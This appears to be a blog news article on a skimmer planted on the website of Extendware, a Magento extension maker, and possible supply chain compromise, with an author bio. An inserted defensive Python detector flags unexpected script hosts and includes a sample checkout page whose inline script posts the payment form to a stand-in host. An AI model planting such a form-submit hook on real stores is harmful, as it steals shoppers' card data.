Attackers deployed a skimmer on the site of Magento extensions provider

Hackers have hit Extendware, a developer of extensions for sites built on the Magento CMS. The attackers planted a skimmer on the company's website and may also have infected its products.

The criminals have been present on Extendware's infrastructure since October 4.

The malicious script is a standard keylogger: it copies users' payment data and sends it to a third-party website. Analysts believe that the destination is another hacked site.
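A defender-side check for the behaviour described above, added here as an example (it is not code from the article or from Sanguine Security): it parses a checkout page and lists every host that page scripts load from or reference which is not on the store's own allowlist, which is how an exfiltration endpoint like the one above shows up. The checkout HTML, the host names and the allowlist are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Collects external <script src> values and the text of inline scripts."""
    def __init__(self):
        super().__init__()
        self.external_srcs, self.inline_bodies = [], []
        self._in_inline = False
    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lowercases tag names
            src = dict(attrs).get("src")
            if src:
                self.external_srcs.append(src)
            else:
                self._in_inline = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False
    def handle_data(self, data):
        if self._in_inline:
            self.inline_bodies.append(data)

# Absolute http(s) URLs mentioned inside inline script text (possible exfiltration endpoints).
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")

def unexpected_script_hosts(html, allowed_hosts):
    """Hosts that scripts on the page load from or talk to, minus the allowlist."""
    parser = ScriptCollector()
    parser.feed(html)
    hosts = set()
    for src in parser.external_srcs:
        host = urlparse(src).hostname  # None for relative paths such as /js/app.js
        if host:
            hosts.add(host)
    for body in parser.inline_bodies:
        hosts.update(urlparse(u).hostname for u in URL_RE.findall(body))
    return sorted(h for h in hosts if h not in allowed_hosts)

# Constructed checkout page: one legitimate CDN script plus an inline script that posts the
# payment form to a host the store does not own (a stand-in for an injected skimmer).
SAMPLE_CHECKOUT_HTML = """<html><body>
<script src="https://cdn.example/static/checkout.js"></script>
<form id="payment" action="/checkout/"><input name="cc_number"></form>
<script>document.getElementById("payment").addEventListener("submit", function () {
  fetch("https://stats.example.net/collect", {method: "POST", body: "..."});
});</script></body></html>"""
ALLOWED_HOSTS = {"shop.example", "cdn.example"}  # constructed allowlist of the store's own hosts
```

Run `unexpected_script_hosts(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS)` against a saved copy of the checkout page; any host it returns is worth investigating, and a clean run on a known-good snapshot gives a baseline to compare against.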

Experts found the skimmer on the Extendware website itself, but warned that this might also be a supply chain attack.

“In theory, they could have injected a backdoor or skimmer in all of the Extendware products, thereby gaining control of all stores that would install their software. This is also known as a ‘supply chain attack’,” report Sanguine Security specialists.

Write access to the Extendware server would also let the criminals compromise the distribution packages stored there by injecting malicious code into them. This means that every online store using this supplier's extensions is at risk.


Experts reported the incident to the Extendware developers and asked whether it had any impact on the integrity of the software hosted on the server. At the time of writing, the company had not published a statement on the matter: the last entry in its news feed is dated September 12, and the last posts on Facebook and Twitter October 1.

“Because e-commerce vendors are such an attractive target to payment skimmers, this Extendware case suggests that attackers may have used a novel method to gain access,” report Sanguine Security researchers.

The Extendware hack became known shortly after security experts presented a detailed study of cyber attacks on Magento sites. Among other things, the experts noted the growing interest of criminals in supply chains, which allow them to significantly increase their reach.

At the end of 2018, analysts at several information security companies put such attacks on the list of major threats for the near future. The forecast was quickly confirmed: in recent years, criminals have compromised a repository of extensions and PHP applications, the official ASUS update service, and several companies in the gaming industry.

Experts recommend that Extendware customers not install extensions downloaded or released in the last week.

William Reddy

I am from Ireland. My parents bought me a computer when I was 11, and several months later I got a virus on this PC. I decided to enter the INSA Centre Val de Loire university after graduating from school. This French educational institution was offering a brand-new cybersecurity course. After getting my master's degree in cybersecurity, I started working as a virus analyst at a small anti-malware vendor. In 2018, I decided to start the Virus Removal project. The main goal of this site is to help people deal with PC viruses of any kind.
